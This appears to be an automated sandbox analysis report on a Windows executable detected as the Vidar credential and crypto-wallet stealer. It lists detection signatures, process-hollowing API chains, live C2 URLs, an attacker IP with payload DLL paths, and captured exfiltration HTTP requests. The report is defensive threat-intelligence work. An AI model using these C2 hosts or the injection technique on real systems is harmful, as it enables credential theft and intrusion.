Windows Analysis Report
82xul16VKj.exe

Overview

General Information

Sample name: 82xul16VKj.exe
renamed because original name is a hash value
Original sample name: 07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
Analysis ID: 1466531
MD5: eb2f14b68aa11a4aea94985c87714811
SHA1: 2fa340debaa9fbe53ad934403d64a827ddde9445
SHA256: 07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957
Infos:

Detection

CryptOne, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 82xul16VKj.exe Avira: detected
Antivirus detection for URL or domain
Source: https://steamcommunity.com/profiles/76561199730044335 Avira URL Cloud: Label: malware
Source: https://t.me/bu77un Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}
Multi AV Scanner detection for domain / URL
Source: survey-smiles.com Virustotal: Detection: 8% Perma Link
Source: http://survey-smiles.com/R Virustotal: Detection: 12% Perma Link
Source: http://survey-smiles.com/ Virustotal: Detection: 8% Perma Link
Source: http://survey-smiles.com/z Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: 82xul16VKj.exe Virustotal: Detection: 39% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.3% probability
Machine Learning detection for sample
Source: 82xul16VKj.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: I8S%
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: usernameField
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: a GX Stable
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: uctName
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: layVersion
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: sktop\
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: F783D5D3EF8C*
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: T=@?VDX;W:R1J )M$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: #5EG P%:{
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: ystemInfo
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: 304FDQ8L\h$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: %hu/%hu
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: ero\wallet.k9ys
Uses 32bit PE files
Source: 82xul16VKj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199730044335
Source: Malware configuration extractor URLs: https://t.me/bu77un
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 116.202.180.70:5432
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.243.226 199.59.243.226
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JEVOW3XT.htm Jump to behavior
Source: global traffic HTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tea.arpdabl.org
Source: global traffic DNS traffic detected: DNS query: survey-smiles.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: kat2B07.tmp, 00000002.00000003.356734139.0000000000946000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356820905.0000000000948000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356654978.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.366603952.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.360869270.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envx
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://survey-smiles.com/R
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://survey-smiles.com/z
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/)
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/v
Source: kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org5432Content-Disposition:
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.orgHJK
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70/2
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70/I
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432
Source: kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/2r
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/freebl3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/mozglue.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/msvcp140.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/nss3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/softokn3.dll%
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/softokn3.dllP
Source: kat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/sqlt.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/vcruntime140.dll
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432Content-Disposition:
Source: BAEBGC.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BAEBGC.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAEBGC.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: BAEBGC.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/bu77un
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/bu77unguf_hMozilla/5.0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: BAEBGC.2.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=net
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=wmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2
Yara detected Keylogger Generic
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_02EEBEF0
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEB250 NtCreateFile,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CloseHandle, 0_2_02EEB250
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEB510 NtProtectVirtualMemory,NtProtectVirtualMemory, 0_2_02EEB510
Detected potential crypto function
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEC510 0_2_02EEC510
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D744CF0 2_2_1D744CF0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D761C50 2_2_1D761C50
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D899CC0 2_2_1D899CC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73292D 2_2_1D73292D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7312A8 2_2_1D7312A8
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732AA9 2_2_1D732AA9
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7E5940 2_2_1D7E5940
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D731C9E 2_2_1D731C9E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D859A20 2_2_1D859A20
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732018 2_2_1D732018
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73D4C0 2_2_1D73D4C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D899430 2_2_1D899430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ED6D0 2_2_1D7ED6D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D9690 2_2_1D7D9690
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D749000 2_2_1D749000
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D855040 2_2_1D855040
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D733580 2_2_1D733580
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7C53B0 2_2_1D7C53B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D90D209 2_2_1D90D209
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D758D2A 2_2_1D758D2A
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D76CE10 2_2_1D76CE10
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73C800 2_2_1D73C800
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D731EF1 2_2_1D731EF1
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D834A60 2_2_1D834A60
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D870480 2_2_1D870480
